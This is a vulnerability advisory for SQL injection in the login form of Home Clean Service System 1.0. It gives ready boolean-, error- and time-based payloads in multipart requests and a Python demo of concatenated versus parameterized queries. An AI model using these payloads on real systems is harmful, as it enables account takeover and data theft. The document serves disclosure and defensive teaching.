Home Clean Service System 1.0 SQL Injection
Home Clean Service System version 1.0 suffers from a remote SQL injection vulnerability.
## Title: Home Clean Service System v1.0 - 2022 SQLi
## Author: nu11secur1ty
## Date: 04.27.2022
## Vendor: https://www.sourcecodester.com/users/acetech
## Software: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System

## Description:
The `password` parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the password parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. An attacker can take control of the administrator account and of all other accounts on this system, and can also download all information about this system.

Status: CRITICAL

[+] Payloads:

```mysql
---
Parameter: MULTIPART email ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="email"

[email protected]' OR NOT 6564=6564-- aWQp
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"

t8I!x2y!H3'
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="login"


------WebKitFormBoundary8kMPLwTOJeesgEBx--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="email"

[email protected]' AND (SELECT 6279 FROM(SELECT COUNT(*),CONCAT(0x7176716271,(SELECT(ELT(6279=6279,1))),0x716a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- LSfT
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"

t8I!x2y!H3'
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="login"


------WebKitFormBoundary8kMPLwTOJeesgEBx--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="email"

[email protected]' AND (SELECT 4830 FROM(SELECT(SLEEP(5)))kgBM)-- GxTm
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"

t8I!x2y!H3'
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="login"


------WebKitFormBoundary8kMPLwTOJeesgEBx--
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System)

## Proof and Exploit:
[href](https://streamable.com/l107o6)
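
The quote behaviour from the description and the fix for it, as an added example (not the application's code, which this advisory does not show): a hypothetical login query built by string concatenation next to the same query with bound parameters. An in-memory SQLite database stands in for MySQL, and the table, the addresses and the function names are constructed for the demo.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the application's user table (assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    # Plaintext only to keep the demo short; real code stores a password hash.
    db.execute("INSERT INTO users (email, password) VALUES (?, ?)",
               ("admin@example.test", "correct-horse"))
    return db

def run(db, sql, params=()):
    """Map a query outcome to what the login form would show."""
    try:
        return "ok" if db.execute(sql, params).fetchone() else "denied"
    except sqlite3.Error:
        return "db-error"  # the database error message seen with one quote

def login_concat(db, email, password):
    """Vulnerable pattern: request values become part of the SQL text."""
    sql = ("SELECT id FROM users WHERE email = '" + email +
           "' AND password = '" + password + "'")
    return run(db, sql)

def login_param(db, email, password):
    """Hardened pattern: values are bound and never parsed as SQL."""
    sql = "SELECT id FROM users WHERE email = ? AND password = ?"
    return run(db, sql, (email, password))

def probe(login):
    """Send the inputs discussed on this page to one login function."""
    db = make_db()
    user = "admin@example.test"
    return {
        "one_quote": login(db, user, "'"),     # unbalanced quote
        "two_quotes": login(db, user, "''"),   # balanced again
        # boolean condition copied from the page's first payload
        "page_boolean": login(db, user + "' OR NOT 6564=6564-- aWQp", "wrong"),
        "valid": login(db, user, "correct-horse"),
    }

if __name__ == "__main__":
    for name, fn in (("concatenated", login_concat), ("parameterized", login_param)):
        print(name, probe(fn))
```

With concatenation, one quote breaks the statement and two quotes repair it, which is the error-then-no-error pattern the description reports; with bound parameters every probe is compared as a literal string and only the correct credentials succeed.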